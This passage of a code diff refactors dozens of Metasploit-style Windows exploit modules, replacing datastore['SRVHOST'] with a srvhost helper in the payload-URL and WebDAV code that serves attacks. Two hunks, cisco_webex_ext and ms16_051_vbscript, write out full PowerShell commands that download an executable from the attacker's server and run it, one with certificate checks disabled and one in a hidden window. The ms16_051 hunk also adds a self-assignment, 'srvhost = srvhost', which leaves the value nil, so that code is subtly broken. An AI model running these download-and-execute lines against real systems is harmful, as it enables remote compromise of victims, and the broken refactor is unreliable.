+++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/#{@payload_rand}"
 
     if (request.uri.match(/#{@payload_rand}/))

--- a/modules/exploits/windows/browser/cisco_webex_ext.rb
+++ b/modules/exploits/windows/browser/cisco_webex_ext.rb
@@ -76,7 +76,7 @@ var msg = {
     GpcSuppressInstallation: btoa("True"),
     GpcFullPage: "True",
     GpcInitCall: btoa("_wsystem(Ex1);"),
-    Ex1: btoa("PowerShell [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; $wc = New-Object System.Net.WebClient ; $pl = $env:temp+'\\#{@payload_exe}' ; $wc.DownloadFile('https://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{base_uri}/#{@payload_uri}', $pl) ; Start-Process $pl"),
+    Ex1: btoa("PowerShell [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; $wc = New-Object System.Net.WebClient ; $pl = $env:temp+'\\#{@payload_exe}' ; $wc.DownloadFile('https://#{srvhost}:#{datastore['SRVPORT']}#{base_uri}/#{@payload_uri}', $pl) ; Start-Process $pl"),
 }
 
 function runcode()

--- a/modules/exploits/windows/browser/dxstudio_player_exec.rb
+++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     url_base = "http://"
-    url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    url_base += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     url_base += ":" + datastore['SRVPORT'].to_s + get_resource()
 
     payload_url = url_base + "/payload"

--- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
+++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
+++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
@@ -170,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote
       resp = create_response(301, "Moved Permanently")
       resp.body = ""
 
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
       if datastore['SSL']
         schema = "https"
       else

--- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
@@ -185,7 +185,7 @@ SetLocale(#{var_origLoc})|)
     end
 
     uri = ((datastore['SSL']) ? "https://" : "http://")
-    uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'])
+    uri << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost)
     uri << ":#{datastore['SRVPORT']}"
 
     print_status("Request received for #{request.uri}");

--- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
+++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
@@ -180,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # HTML requests sent by IE and Firefox
       #
       # This could probably use the Host header from the request
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
 
       # Always prepare the UNC path, even if we dont use it for this request...
       if (datastore['UNCPATH'])

--- a/modules/exploits/windows/browser/java_ws_double_quote.rb
+++ b/modules/exploits/windows/browser/java_ws_double_quote.rb
@@ -175,7 +175,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if (datastore['UNCPATH'])
         unc = datastore['UNCPATH'].dup
       else
-        my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+        my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
         unc = "\\\\" + my_host + "\\" + share_name
       end
 

--- a/modules/exploits/windows/browser/java_ws_vmargs.rb
+++ b/modules/exploits/windows/browser/java_ws_vmargs.rb
@@ -182,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
         unc = datastore['UNCPATH'].dup
       else
         # This could probably use the Host header from the request
-        my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+        my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
         unc = "\\\\" + my_host + "\\" + share_name
       end
 

--- a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb
+++ b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
       #
       # HTML requests sent by IE and Firefox
       #
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
       path = request.uri.gsub(/\//, '\\\\\\')
       payload_unc = '\\\\\\\\' + my_host + path + @var_exe_name + '.chm'
       mof_unc = '\\\\\\\\' + my_host + path + @var_mof_name + '.chm'

--- a/modules/exploits/windows/browser/macrovision_unsafe.rb
+++ b/modules/exploits/windows/browser/macrovision_unsafe.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb
@@ -342,7 +342,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     return '<img src="moz-icon:file://///' +
-           datastore['SRVHOST'] +
+           srvhost +
            path + '/' + rand_text_alphanumeric(rand(80) + 16) + '.ani">'
   end
 

--- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
+++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
+++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
@@ -174,7 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
       #
       # HTML requests sent by IE and Firefox
       #
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
       name = rand_text_alphanumeric(rand(8) + 8)
       # path = get_resource.gsub(/\//, '\\')
       path = request.uri.gsub(/\//, '\\')

--- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    @my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    @my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
     @url_base = "http://" + @my_host
 

--- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
+++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav = "\\\\#{myhost}\\"
 
     if (request.uri =~ /\.dll$/i)
@@ -139,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Received WebDAV PROPFIND request for #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path =~ /\.dll$/i
@@ -422,7 +422,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['UNCHOST'])
       unc << datastore['UNCHOST'].dup
     else
-      unc << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+      unc << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost)
     end
     unc << "\\"
     unc << rand_text_alpha(rand(8) + 4)

--- a/modules/exploits/windows/browser/ms16_051_vbscript.rb
+++ b/modules/exploits/windows/browser/ms16_051_vbscript.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit_html(req_uri)
-    srvhost = datastore['SRVHOST']
+    srvhost = srvhost
     srvport = datastore['SRVPORT']
 
     template = <<-EOF
@@ -417,7 +417,7 @@ class MetasploitModule < Msf::Exploit::Remote
                 overwrite arg1, olescript + &H174
 
                 Set shObj = CreateObject("Wscript.shell")
-                shObj.Run("PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'\\#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d")
+                shObj.Run("PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'\\#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{srvhost}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d")
                 shObj.Run("%temp%\\#{@payload_exe}")
 
             End Function

--- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb
+++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_srvhost
     # If the SRVHOST isn't the default 0.0.0.0, obviously the user wants to
     # specify, so we will not force source_address()
-    return datastore['SRVHOST'] if datastore['SRVHOST'] != '0.0.0.0'
+    return srvhost if srvhost != '0.0.0.0'
 
     Rex::Socket.source_address(cli.peerhost)
   end

--- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb
+++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     if datastore['SSL']
       schema = "https"
     else

--- a/modules/exploits/windows/browser/persits_xupload_traversal.rb
+++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
       exe_uri << "?" + token
 
       exe_host = ""
-      exe_host << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'])
+      exe_host << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost)
 
       exe_hostport = datastore['SRVPORT']
 

--- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb
+++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Payload's URL
-    payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_src = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
 
     # Create the stager (download + execute payload)

--- a/modules/exploits/windows/browser/safari_xslt_output.rb
+++ b/modules/exploits/windows/browser/safari_xslt_output.rb
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     url = "http://"
-    url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
 
     content = <<~EOS

--- a/modules/exploits/windows/browser/samsung_security_manager_put.rb
+++ b/modules/exploits/windows/browser/samsung_security_manager_put.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_name = rand_text_alpha(rand(10) + 5) + '.js'
 
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/" + js_name
 
     # we deliver the JavaScript code that does the work for us

--- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
+++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
 
     if (request.uri.match(/PAYLOAD/))

--- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
+++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
+++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
@@ -104,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def prompt_uplay(cli, request)
     url = "http://"
-    url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
 
     path = "#{@exploit_unc}#{@share_name}\\#{@basename}.exe"
@@ -135,7 +135,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
   end
 
   def process_get(cli, request)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav = "\\\\#{myhost}\\"
 
     if blacklisted_path?(request.uri)
@@ -201,7 +201,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
     vprint_status("PROPFIND #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/
@@ -420,7 +420,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
       @uplay_uri = rand_text_alpha(8)
     end
 
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
 
     @exploit_unc = "\\\\#{myhost}\\"
 

--- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb
+++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav = "\\\\#{myhost}\\"
 
     if blacklisted_path?(request.uri)
@@ -149,7 +149,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("PROPFIND #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/
@@ -355,7 +355,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
 
     @exploit_unc = "\\\\#{myhost}\\"
 

--- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
+++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
+++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Payload's URL
-    payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_src = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
 
     # Create the stager (download + execute payload)

--- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav = "\\\\#{myhost}\\"
 
     if (request.uri =~ /\.exe$/i)
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport} #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path =~ /\.exe$/i
@@ -318,7 +318,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['UNCHOST'])
       unc = datastore['UNCHOST'].dup
     else
-      unc = ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+      unc = ((srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost)
     end
 
     @exploit_unc_host = unc

--- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav = "\\\\#{myhost}\\"
 
     if (request.uri =~ /\.exe$/i)
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Received WebDAV PROPFIND request from: #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path =~ /\.exe$/i
@@ -314,7 +314,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['UNCHOST'])
       unc = datastore['UNCHOST'].dup
     else
-      unc = ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+      unc = ((srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost)
     end
 
     @exploit_unc_host = unc

--- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
+++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Received WebDAV PROPFIND request from: #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/

--- a/modules/exploits/windows/fileformat/ms12_005.rb
+++ b/modules/exploits/windows/fileformat/ms12_005.rb
@@ -214,7 +214,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    @ip = srvhost == '0.0.0.0' ? Rex::Socket.source_address('50.50.50.50') : srvhost
     @port = datastore['SRVPORT']
 
     print_status("Generating our docm file...")

--- a/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb
+++ b/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb
@@ -119,10 +119,10 @@ class MetasploitModule < Msf::Exploit::Remote
     @payload_name = rand_text_alpha(4)
     @temp_folder = "/Windows/Temp"
     register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       lhost = Rex::Socket.source_address('50.50.50.50')
     else
-      lhost = datastore['SRVHOST']
+      lhost = srvhost
     end
     payload_src = lhost
     payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"

--- a/modules/exploits/windows/fileformat/office_word_hta.rb
+++ b/modules/exploits/windows/fileformat/office_word_hta.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def generate_uri
     uri_maxlength = 112
 
-    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
+    host = srvhost == '0.0.0.0' ? Rex::Socket.source_address : srvhost
     scheme = datastore['SSL'] ? 'https' : 'http'
 
     uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"

--- a/modules/exploits/windows/fileformat/word_msdtjs_rce.rb
+++ b/modules/exploits/windows/fileformat/word_msdtjs_rce.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_html
-    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1"
+    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1"
 
     dummy = ''
     (1..random_int(61, 100)).each do |_n|
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')
     end
 
-    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
+    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
     @docx.each do |entry|
       case entry[:fname]
       when 'word/_rels/document.xml.rels'
@@ -180,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def build_rtf
     print_status('Generating a malicious rtf file')
 
-    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
+    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
     uri_space = 76 # this includes the required null character
     uri_max = uri_space - 1
     if uri.length > uri_max

--- a/modules/exploits/windows/fileformat/word_mshtml_rce.rb
+++ b/modules/exploits/windows/fileformat/word_mshtml_rce.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_html
-    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab"
+    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab"
     inf = "#{File.basename(@my_resources.first)}.inf"
 
     file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')
@@ -225,7 +225,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')
     end
 
-    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
+    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
     @docx.each do |entry|
       case entry[:fname]
       when 'word/document.xml'
@@ -322,7 +322,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('CVE-2021-40444: Generate a malicious docx file')
 
     @proto = (datastore['SSL'] ? 'https' : 'http')
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       datastore['SRVHOST'] = Rex::Socket.source_address
     end
 

--- a/modules/exploits/windows/ftp/ayukov_nftp.rb
+++ b/modules/exploits/windows/ftp/ayukov_nftp.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
